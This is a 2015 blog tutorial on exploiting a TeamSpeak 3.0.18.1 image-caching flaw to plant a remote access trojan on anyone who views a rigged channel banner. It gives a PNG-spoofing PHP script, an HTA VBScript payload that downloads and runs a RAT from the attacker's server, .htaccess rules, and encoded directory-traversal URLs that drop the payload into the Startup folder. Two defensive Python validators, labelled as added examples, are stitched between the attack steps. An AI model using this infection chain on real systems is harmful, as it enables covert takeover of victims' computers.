Using TeamSpeak 3.0.18.1 Exploit To Hack Vulnerable PC [RFI/RCE Exploit] | Aleri0n V0RT3X

17 December, 2015

Using TeamSpeak 3.0.18.1 Exploit To Hack Vulnerable PC [RFI/RCE Exploit]

Please do understand that this is for educational purposes only. I won't be held responsible for anything illegal you do using this tutorial. Anyway, I haven't written a tutorial on here in quite some time so I may be a little rusty, but hopefully it'll be easy to read and easy on the eyes! In this guide I'm going to be showing you how to infect someone by only having them join a TeamSpeak 3 server. This has been patched now; however, there has only been one patch since this exploit was discovered, so many people may still be running this version of TeamSpeak 3.

This exploit abuses the way that TeamSpeak shows channel images such as banners to the user: it downloads them into a local cache, and that caching step is what we take advantage of. So if you're interested, read on! If you are lazy then feel free to watch the video guide by scrolling down.

Disclaimer
I'd like to make it perfectly clear that I did not discover this exploit, but a user named Scurippio, and you can read his full exploit report over on Exploit-DB. All I have done is adapted the VBScript to download a RAT Server and execute it. And I guess I can take credit for both this written guide and the video guide. Now with that being said, let's move onto the tools we're going to need.

Tools Required
There are a couple of tools we are going to need to carry out this exploit, but they are easy to acquire.

  • Webserver (With .htaccess and FTP Support)
  • Darkcomet (Or RAT of your choice) Download here | Setup video here
  • TeamSpeak 3 3.0.18.1 (the victim needs this version; it can be downloaded from here)
  • TeamSpeak 3 server, which you can buy or download from here; or, if you're already an admin/have permissions to edit channel banners, then you're all set!

Guide
Okay. Let me explain how this exploit works. When a channel banner is set in a TeamSpeak server with the [img] bbcode tags, the client will check the URL and download the image into its cache. However, the first vulnerability here is that TeamSpeak does not properly check URLs to make sure they point to a picture, so we can fake extensions such as .hta, .src and .msi. TeamSpeak only decides it's a picture by checking the response header, which we can easily overcome by making a .php script with:

<?php
header ('Content-type: image/png');
echo "\211PNG\r\n\032\n";
?>

This tricks TeamSpeak into treating the response as a picture, so it fetches and caches the URL. Because TeamSpeak saves whatever comes back from the URL as if it were a picture, we can write a simple PHP script that serves a .HTA file instead.

<?php
header ('Content-type: image/png');
echo "\211PNG\r\n\032\n";
?>
<html>
<head>
<title>PWN3D</title>
<HTA:APPLICATION
APPLICATIONNAME="TeamSpeak3 Vul"
ID="PwnSpeak"
VERSION="1.0"/>
<script language="VBScript">
Set oShell = CreateObject("Wscript.Shell")
strUserProfile = oShell.ExpandEnvironmentStrings("%USERPROFILE%\update.exe")
dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", "<LINK TO YOUR RAT SERVER>", False
xHttp.Send
with bStrm
.type = 1 '//binary
.open
.write xHttp.responseBody
.savetofile strUserProfile, 2 '//overwrite0
end with
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run strUserProfile
</script>
</head>
</html>

So what this PHP script does is create a .HTA file that, when run, executes a VBScript that downloads our RAT Server and runs it. The RAT Server is saved in the user profile as "update.exe", so make sure that your RAT Server automatically deletes itself when executed.
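
The weak check described above (eight signature bytes plus a Content-Type header) is the whole reason the PNG/HTA polyglot works. The following is an added example, not code from the post or from TeamSpeak, of what a downloader should do instead: require a CRC-valid IHDR chunk right after the signature, and refuse bodies that carry HTA, HTML or VBScript markers. The function names are mine, and the two sample bodies are constructed inline (the "spoofed" one mirrors the post's signature-plus-HTA layout).

```python
"""Check whether a downloaded 'image' is really a PNG, or a PNG-headed polyglot."""
import struct
import zlib

# Eight-byte PNG signature; the post's PHP script emits exactly these bytes.
PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"

# Byte strings that never belong in image data; matched case-insensitively.
SCRIPT_MARKERS = (b"<hta:application", b"<script", b"<html", b"createobject(")


def read_chunk(data: bytes, offset: int):
    """Parse one PNG chunk at `offset`.

    Returns (chunk_type, payload, next_offset), or None if the chunk is
    truncated or its CRC does not match (both are signs of a fake PNG).
    """
    if offset + 8 > len(data):
        return None
    length, chunk_type = struct.unpack(">I4s", data[offset:offset + 8])
    start = offset + 8
    end = start + length
    if end + 4 > len(data):
        return None
    payload = data[start:end]
    (crc,) = struct.unpack(">I", data[end:end + 4])
    if zlib.crc32(chunk_type + payload) & 0xFFFFFFFF != crc:
        return None
    return chunk_type, payload, end + 4


def is_structurally_png(data: bytes) -> bool:
    """True only if the signature is followed by a CRC-valid 13-byte IHDR chunk."""
    if not data.startswith(PNG_SIGNATURE):
        return False
    chunk = read_chunk(data, len(PNG_SIGNATURE))
    if chunk is None:
        return False
    chunk_type, payload, _ = chunk
    return chunk_type == b"IHDR" and len(payload) == 13


def contains_script_markers(data: bytes) -> bool:
    """Cheap triage: does the body carry HTA/HTML/VBScript markers?"""
    lowered = data.lower()
    return any(marker in lowered for marker in SCRIPT_MARKERS)


def classify_download(data: bytes) -> str:
    """Decide whether a body fetched for an [img] tag may be written to the cache."""
    if contains_script_markers(data):
        return "reject: script or HTA markup inside image body"
    if not is_structurally_png(data):
        return "reject: PNG signature not followed by a valid IHDR chunk"
    return "accept"


def make_ihdr(width: int, height: int) -> bytes:
    """Build a real IHDR chunk (8-bit RGBA) so the sample below is a genuine PNG prefix."""
    payload = struct.pack(">IIBBBBB", width, height, 8, 6, 0, 0, 0)
    body = b"IHDR" + payload
    return struct.pack(">I", len(payload)) + body + struct.pack(">I", zlib.crc32(body) & 0xFFFFFFFF)


# Constructed samples: a genuine PNG prefix, and the post's spoof (signature + HTA markup).
REAL_PNG_PREFIX = PNG_SIGNATURE + make_ihdr(1, 1)
SPOOFED_HTA = PNG_SIGNATURE + (
    b'<html><head><title>PWN3D</title>'
    b'<HTA:APPLICATION ID="PwnSpeak"/><script language="VBScript"></script>'
    b'</head></html>'
)

if __name__ == "__main__":
    for name, sample in (("real png prefix", REAL_PNG_PREFIX), ("spoofed hta", SPOOFED_HTA)):
        print(f"{name}: {classify_download(sample)}")
```

The structural check is the real gate: the spoofed body fails it because the bytes after the signature do not parse as a chunk with a matching CRC. The marker scan is only a cheap heuristic (compressed image data could in theory contain those strings), which is why the same two functions are also useful for triaging files already sitting in a client's cache or Startup folder.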

Now we have our PHP script, which needs to be uploaded to a webserver. We also need to edit our .htaccess file so that it automatically redirects the webserver's domain name to our PHP file, so add these rewrite rules to your .htaccess file.

RewriteEngine On
RewriteCond %{REQUEST_URI} !/ts3.php
RewriteRule .* /ts3.php

Make sure your PHP file is named "ts3.php", or simply change the filename in the rewrite rules in your .htaccess file.

Okay, so our PHP script is on our webserver and when we go to our domain it doesn't display anything. Our browser won't execute this .HTA script, so don't worry about infecting yourself. We are now ready to exploit the vulnerability.

Whenever TS3 downloads an image it stores it in

"%userprofile%\AppData\Roaming\TS3Client\cache\remote\www.domain.com\"

Now, using a classic web weakness called "directory traversal", we can make TeamSpeak write our .hta file somewhere else... for example, the Startup folder.

Using URL encoding we can easily do this.

This is what the URL looks like without URL encoding:

http://domain.com/..\..\..\..\..\..\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pwnspeak.hta

Now using URL encoding:

http://domain.com/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cRoaming%5cMicrosoft%5cWindows%5cStart%20Menu%5cPrograms%5cStartup%5cpwnspeak.hta

Or

http://domain.com/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cRoaming%5cMicrosoft%5cWindows%5cStart%20Menu%5cPrograms%5cStartup%5cpwnspeak.hta

Now that we have our malicious link, we can put it inside [img] tags in our channel description!

With that in place, whenever someone clicks on the channel it will download our pwnspeak.hta file into the Startup folder, and on the next restart the VBScript will run and infect the victim with our RAT Server.
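
The cache path problem above comes down to one missing step: the client appends the decoded URL path to its cache directory without checking where the result ends up. The following is an added example, not code from the post or from TeamSpeak, that models the unsafe resolution next to a hardened one. The cache root is a constructed path in forward-slash form so the script runs on any OS, the function names are mine, and the URL is the first encoded one from the post. The hardened resolver decodes until stable (so double-encoded dots cannot sneak through), folds both separators, refuses any ".." segment, allows only image extensions, and finally confirms the normalised path still sits under the root.

```python
"""Resolve an [img] URL to a cache path safely, rejecting traversal and non-image names."""
import posixpath
from urllib.parse import unquote, urlsplit

# Constructed cache root matching the layout the post describes (forward slashes for portability).
CACHE_ROOT = "C:/Users/victim/AppData/Roaming/TS3Client/cache/remote"
ALLOWED_EXTENSIONS = {".png", ".jpg", ".jpeg", ".gif"}

# The first encoded URL from the post, verbatim.
POST_URL = ("http://domain.com/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cRoaming%5cMicrosoft"
            "%5cWindows%5cStart%20Menu%5cPrograms%5cStartup%5cpwnspeak.hta")


def fully_decode(path: str) -> str:
    """Percent-decode until stable so %252e (double-encoded '.') cannot slip through."""
    while True:
        decoded = unquote(path)
        if decoded == path:
            return decoded
        path = decoded


def naive_cache_path(url: str) -> str:
    """Model of the unsafe behaviour: host + decoded path appended to the root verbatim.

    Backslashes are folded to '/' because Windows accepts either separator; the real
    client would hand the resulting string straight to the filesystem.
    """
    parts = urlsplit(url)
    decoded = fully_decode(parts.path).replace("\\", "/")
    return posixpath.normpath(posixpath.join(CACHE_ROOT, parts.hostname or "", decoded.lstrip("/")))


def safe_cache_path(url: str):
    """Hardened resolver: returns the cache path, or None if the URL must be refused."""
    parts = urlsplit(url)
    host = parts.hostname or ""
    decoded = fully_decode(parts.path).replace("\\", "/")
    segments = [s for s in decoded.split("/") if s not in ("", ".")]
    # 1. No traversal segments anywhere, and no empty filename.
    if not segments or ".." in segments or ".." in host:
        return None
    # 2. Only image extensions are ever written to disk.
    if posixpath.splitext(segments[-1])[1].lower() not in ALLOWED_EXTENSIONS:
        return None
    # 3. Belt and braces: the normalised result must still sit under the cache root.
    target = posixpath.normpath(posixpath.join(CACHE_ROOT, host, *segments))
    if posixpath.commonpath([CACHE_ROOT, target]) != CACHE_ROOT:
        return None
    return target


if __name__ == "__main__":
    print("naive:", naive_cache_path(POST_URL))
    print("safe :", safe_cache_path(POST_URL))
    print("safe :", safe_cache_path("http://domain.com/images/banner.png"))
```

Run stand-alone, the naive resolver lands the post's URL in the Startup folder, while the hardened one returns None for it, for a double-encoded variant, and for any non-image filename, and only yields a path for a plain banner URL. Folding backslashes before the check matters: a validator that only looks for "../" passes the "..\" form used in the post.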

Last Modified: 17 December, 2015
